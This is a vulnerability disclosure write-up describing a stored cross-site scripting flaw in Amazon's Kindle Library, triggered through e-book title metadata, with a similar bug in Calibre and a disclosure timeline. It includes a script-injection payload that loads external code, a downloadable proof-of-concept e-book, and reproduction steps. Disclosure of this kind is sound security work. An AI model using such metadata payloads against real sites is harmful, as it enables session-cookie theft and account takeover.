Amazon.com Stored XSS via Book Metadata

简介: Amazon's Kindle Library, also known as "Manage Your Content and Devices" and "Manage your Kind...
Amazon's Kindle Library , also known as "Manage Your Content and Devices" and "Manage your Kindle",  is, at the time of writing, vulnerable to Stored Cross-Site Scripting (XSS) attacks . Malicious code can be injected via e-book metadata; for example, an e-book's title.

Once an attacker manages to have an e-book (file, document, ...) with a title like
<script src="https://www.example.org/script.js"></script>
added to the victim's library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.


  

Who is affected?


Basically, everyone who uses Amazon's Kindle Library to store e-books or to deliver them to a Kindle.

However, users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon's "Send to Kindle" service to have them delivered to their Kindle. From the supplier's point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.

Users who stick to e-books sold and delivered by Amazon should be safe, unless there's another oversight on Amazon's part, such as the one described here: < http://drwetter.eu/amazon/ >

Proof of Concept & Demonstration


A Proof of Concept (PoC) file can be downloaded from < https://fl7.de/pub/2014/amazon-mobixss/pub.mobi >; its title metadata contains the classic "<script>alert('xss')</script>" payload. Simply send it to your "Send to Kindle" email address and browse to your Kindle Library page at < https://www.amazon.com/mn/dcw/myx.html#/home/content/pdocs/dateDsc/ >. Depending on whether the file was already delivered to your Kindle or not, you may have to select "Pending Deliveries" from the drop-down box below the "Your Content" tab.

And this is what it looks like:


You can remove the file from your library as soon as it has been delivered to your Kindle, and while doing so you will notice about half a dozen additional alert boxes. 

History, Response


When I first reported this vulnerability to Amazon in November 2013,  my initial Proof of Concept, a MOBI e-book with a title similar to the one mentioned above, contained code to collect cookies and send them to me. Interestingly, Amazon's Information Security team continued to use this PoC on internal preproduction systems for months after the vulnerability had been fixed. This made it even more surprising that, when rolling out a new version of the  "Manage your Kindle" web application, Amazon reintroduced this very vulnerability.

Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.

Not Just Amazon


You may be thinking that XSS-inducing metadata in e-books doesn't affect you simply because you are organizing your e-books not through a web interface, but with Calibre <http://calibre-ebook.com/>. Well, have a look at this:

 

 

Calibre's developer, Kovid Goyal, acknowledged the problem less than four hours after I had reported it, and a new release - version 1.80 - including a bugfix was made available the following day. This is quite an impressive response (time), even more so when you consider that Calibre is maintained by an individual who make this software available at no cost. If you are a frequent Calibre user, consider making a donation!

  

Timeline


2013-10-24 Vulnerability discovered.
2013-11-15 Vulnerability reported to security@amazon.com.
2013-11-19 Amazon.com Information Security assigns case number.
2013-12-06 Reported vulnerability fixed.
2014-??-?? Vulnerability reintroduced by "Manage Your Kindle" web page redesign.
2014-07-09 Vulnerability reported to security@amazon.com.
2014-09-12 (Still no response from Amazon. Public disclosure.)
目录
相关文章
|
7月前
|
数据采集 供应链 搜索推荐
什么是 SAP OData Annotations 的 metadata extension files
什么是 SAP OData Annotations 的 metadata extension files
43 0
|
8月前
|
存储 搜索推荐 数据挖掘
PDS(Personal/Enterprise Data Storage)
PDS 是一款集数据存储、管理和智能分析于一体的云存储平台,适用于个人和企业用户。它提供了目录、文件管理功能,以及影像内容的分类打标、人脸聚类等智能分析功能,基于内容的智能搜索能力,用户体系以及第三方身份系统接入能力。用户可基于此开发一套面向企业或个人的网盘系统。PDS 还提供了一些官方应用,可与您的系统组合使用,简化您的开发。
167 2
sbs
Big Metadata: When Metadata is Big Data 论文翻译
[文件: Big Metadata 论文翻译.pdf] 请在PC端预览或下载原论文[文件: p3083-big meta data edara.pdf] 请在PC端预览或下载
sbs
121 0
|
传感器 数据采集 ice
Google Earth Engine ——LANDSAT 7 Collection 1 Tier 1 and Real-Time data DN values数据集
Google Earth Engine ——LANDSAT 7 Collection 1 Tier 1 and Real-Time data DN values数据集
105 0
Google Earth Engine ——LANDSAT 7 Collection 1 Tier 1 and Real-Time data DN values数据集
SAP XS Engine 里的 HANA live report metadata
SAP XS Engine 里的 HANA live report metadata
109 0
SAP XS Engine 里的 HANA live report metadata
An example of EXPORT / IMPORT usage - in office integration and odata metadata model cache
An example of EXPORT / IMPORT usage - in office integration and odata metadata model cache
An example of EXPORT / IMPORT usage - in office integration and odata metadata model cache
Cluster table import - BSP UI component source code is actually stored in cluster table
Cluster table import - BSP UI component source code is actually stored in cluster table
Cluster table import - BSP UI component source code is actually stored in cluster table
How is SAP CDS metadata retrieved from GM6 frontend - text related
How is SAP CDS metadata retrieved from GM6 frontend - text related
How is SAP CDS metadata retrieved from GM6 frontend - text related
|
SQL 关系型数据库 MySQL
Database Visualization using Metabase Part 2 - Use Metabase to Get Insights
In this tutorial, we will install Metabase on an Alibaba Cloud ECS Ubuntu 16.04 server to achieve data visualization.
2235 0
Database Visualization using Metabase Part 2 - Use Metabase to Get Insights
|
Java 开发工具 Android开发
Photo Sharing App Part II: Understanding OSS Functions & Creating UI
We will build a photo sharing Android app with real-time image uploading and downloading functionality using Alibaba Cloud OSS.
2043 0